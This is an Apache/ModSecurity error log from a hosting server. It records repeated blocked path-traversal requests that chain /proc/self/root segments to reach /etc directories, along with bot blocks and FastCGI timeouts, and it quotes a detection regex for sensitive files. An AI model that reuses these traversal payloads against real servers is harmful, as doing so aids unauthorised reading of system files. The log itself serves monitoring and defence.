[Thu Mar 19 16:12:55.357804 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:12:58.863917 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:54300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKuvXLqtnMIWvjpaJEqwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:13:05.821866 2026] [:error] [pid 7545:tid 140411616036608] [client 74.7.243.128:37164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKwX8B84UptSoTJtY0_QAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:13:28.126383 2026] [proxy_fcgi:error] [pid 20435:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:13:58.125566 2026] [proxy_fcgi:error] [pid 21219:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:14:13.566700 2026] [mime_magic:error] [pid 7545:tid 140411674785536] (70014)End of file found: [client 57.141.18.3:43614] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:14:13.819291 2026] [:error] [pid 7545:tid 140411674785536] [client 74.7.244.43:49392] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxLBX8B84UptSoTJtY1HAAAAYg"]
[Thu Mar 19 16:14:23.589841 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41414] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:14:25.608879 2026] [:error] [pid 8307:tid 140411741927168] [client 74.7.228.61:58104] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxLEb-FhjpZGs9ba8qQNQAAAwA"]
[Thu Mar 19 16:14:49.057839 2026] [proxy_fcgi:error] [pid 7893:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42222] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:15:12.045963 2026] [proxy_fcgi:error] [pid 7545:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:15:27.386000 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 57.141.18.38:45134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:15:35.132369 2026] [proxy_fcgi:error] [pid 20435:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:15:57.120340 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44098] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:16:19.323944 2026] [:error] [pid 19655:tid 140411540502272] [client 74.7.243.128:48774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLgk1ujooLWdUDGy76ZgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:16:21.129788 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:16:26.646994 2026] [:error] [pid 19655:tid 140411540502272] [client 74.7.243.128:57968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLik1ujooLWdUDGy76aAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:16:30.281106 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:58570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLjgbLMZ6AikZjR9WBvgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:16:49.137800 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:17:06.017548 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:58576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLsvXLqtnMIWvjpaJFWQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:17:11.129815 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:17:12.764114 2026] [:error] [pid 8307:tid 140411741927168] [client 74.7.243.128:42794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLuL-FhjpZGs9ba8qQZwAAAwA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:17:16.444551 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:42800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxLvNa6ubjKNq_cu4Z7jAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:17:34.133802 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:17:36.877627 2026] [mime_magic:error] [pid 30077:tid 140411699963648] (70014)End of file found: [client 57.141.18.19:48126] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:17:56.123565 2026] [proxy_fcgi:error] [pid 21219:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:18:10.811422 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:55872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxL8hCii7xarUs8iHYQOwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:18:22.930259 2026] [proxy_fcgi:error] [pid 20435:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47714] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:18:54.880207 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:19:14.026393 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.244.43:45580] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxMMvqxLDW4GITHUkSOegAAAQk"]
[Thu Mar 19 16:19:23.325838 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:19:31.054598 2026] [:error] [pid 8307:tid 140411666392832] [client 74.7.228.61:58094] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxMQ7-FhjpZGs9ba8qQkgAAAwk"]
[Thu Mar 19 16:19:51.119847 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:20:11.358756 2026] [:error] [pid 21563:tid 140411708356352] [client 74.7.243.128:43426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMa0pm7ZmxKZTM4bZqNQAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:20:16.416210 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:20:31.370000 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:55552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMfxCii7xarUs8iHYQhAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:20:39.229813 2026] [proxy_fcgi:error] [pid 8307:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:20:48.962386 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:50850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMkAkwaGbbGflqUZDxeAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:21:04.125822 2026] [proxy_fcgi:error] [pid 7545:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51102] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:21:05.028336 2026] [:error] [pid 8307:tid 140411674785536] [client 74.7.243.128:34186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMob-FhjpZGs9ba8qQsAAAAwg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:21:11.649329 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:36004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMp_XLqtnMIWvjpaJFmgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:21:23.027204 2026] [mime_magic:error] [pid 8307:tid 140411674785536] (70014)End of file found: [client 57.141.18.103:51548] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 16:21:27.034122 2026] [proxy_fcgi:error] [pid 21219:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:21:36.768297 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:57776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMwPXLqtnMIWvjpaJFqwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:21:38.918046 2026] [mime_magic:error] [pid 14269:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:55486] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/kbd/keymaps/legacy
[Thu Mar 19 16:21:38.918200 2026] [access_compat:error] [pid 14269:tid 140411733534464] [client 74.7.241.31:55486] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/kbd/keymaps/legacy
[Thu Mar 19 16:21:43.213237 2026] [:error] [pid 7545:tid 140411725141760] [client 74.7.243.128:57792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMx38B84UptSoTJtY1UwAAAYI"], referer: 